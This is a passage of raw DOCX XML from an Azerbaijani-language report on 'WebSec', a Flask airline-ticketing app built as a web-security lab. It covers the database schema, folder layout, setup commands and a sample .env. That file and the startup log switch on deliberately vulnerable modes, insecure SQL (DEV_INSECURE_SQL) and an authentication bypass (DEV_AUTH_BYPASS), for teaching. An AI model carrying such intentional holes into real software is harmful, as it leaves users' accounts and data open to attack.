            <w:tcW w:type="dxa" w:w="14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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Serverless hosting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2046"/>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api/index.py · vercel.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Neon/Supabase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Bulud PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2046"/>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DATABASE_URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4. Verilənlər Bazası Sxemi</w:t>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Server işə başladıqda init_db_postgres() funksiyası avtomatik çağırılır; ayrıca CREATE TABLE komutu icra etməyə ehtiyac yoxdur. Layihənin dörd əsas cədvəli:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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046"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cədvəl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Əsas Sütunlar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3046"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Qeyd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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id (PK), email, password_hash, full_name, about_me, created_at</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3046"/>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UNIQUE email; parol hash ilə saxlanılır</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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flights</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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id (PK), code, from_country, to_country, from_city, to_city, flight_date, price, seats</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3046"/>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Seed data ilə doldurulur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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transactions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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id (PK), user_id (FK→users), flight_id (FK→flights), amount, status, created_at</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3046"/>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Bilet alışı qeydi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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user_uploads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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id (PK), user_id (FK→users), original_name, stored_name, created_at</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3046"/>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Yüklənmiş fayl metadatası</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Layihənin Qurulması (Setup)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1. Qovluq Strukturu</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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">WebSec/                    ← Layihənin kök qovluğu</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">├── backend/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│   └── app.py             ← Əsas Flask tətbiqi (~880 sətir)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">├── frontend/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── login.html / register.html / panel.html</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── aviakassa.html / admin.html</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── auth.js / panel.js / aviakassa.js / admin.js</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── lang.js            ← AZ/RU/EN çoxdillilik (~36 KB)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│   └── style.css          ← Dark theme + glassmorphism (~28 KB)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">├── api/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│   └── index.py           ← Yalnız Vercel üçün: Flask app ixrac</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">├── uploads/               ← İstifadəçi faylları (lokal; .gitignore)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">├── .env                   ← Gizli məlumatlar (.gitignore)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">├── .env.example           ← .env şablonu</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">├── requirements.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">└── vercel.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2. Lokal Mühitdə İşə Salma</w:t>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Aşağıdakı beş addım layihəni işə salmaq üçün kifayətdir:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Addım 1 — Virtual mühit yarat</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">python -m venv .venv</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Addım 2 — Virtual mühiti aktiv et (Windows PowerShell)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">.venv\Scripts\Activate.ps1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Addım 3 — Asılılıqları quraşdır</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pip install -r requirements.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Addım 4 — .env faylını hazırla (.env.example-dan kopyala)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">copy .env.example .env    # Windows</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># cp .env.example .env   # Linux / Mac</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Addım 5 — Serveri işə sal</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">python backend/app.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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Server uğurla başladıqda terminaldə aşağıdakı çıxış görünür:</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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DB: PostgreSQL (DATABASE_URL)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">WEBSEC_LAB: True | Zəif SQL (lab): True | Auth bypass (lab): True</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Frontend: D:\Users\...\WebSec\frontend</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">* Running on http://127.0.0.1:5000  [debug mode: on]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3. .env Faylının Konfiqurasiyası</w:t>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Həssas məlumatlar (DB şifrəsi, gizli açar) kodun içinə yazılmır — .env faylında saxlanılır. Bu fayl .gitignore vasitəsilə git repozitoriyasına düşmür.</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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># .env — bu faylı heç vaxt git-ə əlavə etmə!</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">FLASK_SECRET_KEY=buraya-minimum-32-simvollu-tesadufi-metn</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DATABASE_URL=postgresql://postgres:sifre@localhost:5432/aviakassa</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Lab rejimi:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">WEBSEC_LAB=1        # 1 = açıq, 0 = söndür</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEV_INSECURE_SQL=1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEV_AUTH_BYPASS=1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="2E75B6" w:sz="24"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
